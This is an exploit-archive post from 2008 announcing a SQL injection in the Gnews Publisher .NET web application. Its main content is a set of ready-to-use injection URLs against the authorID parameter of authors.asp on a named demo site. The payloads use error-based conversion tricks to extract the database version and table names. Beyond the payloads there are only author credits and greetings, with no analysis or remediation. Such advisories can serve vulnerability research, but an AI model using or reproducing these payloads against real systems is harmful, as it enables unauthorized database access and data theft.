[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Gnews Publisher .NET (authors.asp authorID) SQL Injection Vulnerability
# Published : 2008-12-16
# Author : AlpHaNiX
# Previous Title : Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities
# Next Title : Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Gnews Publisher
#download : null
#Demo : http://www.gazatem.com/demos/gnews/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=(SQL)
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+@@version));--
http://www.gazatem.com/demos/gnews/authors.asp?authorID=convert(int,(select+top+1+table_name+from+information_schema.tables));--
#Greetz For my Best Friend Zigma
###########################################################################
# www.Syue.com [2008-12-16]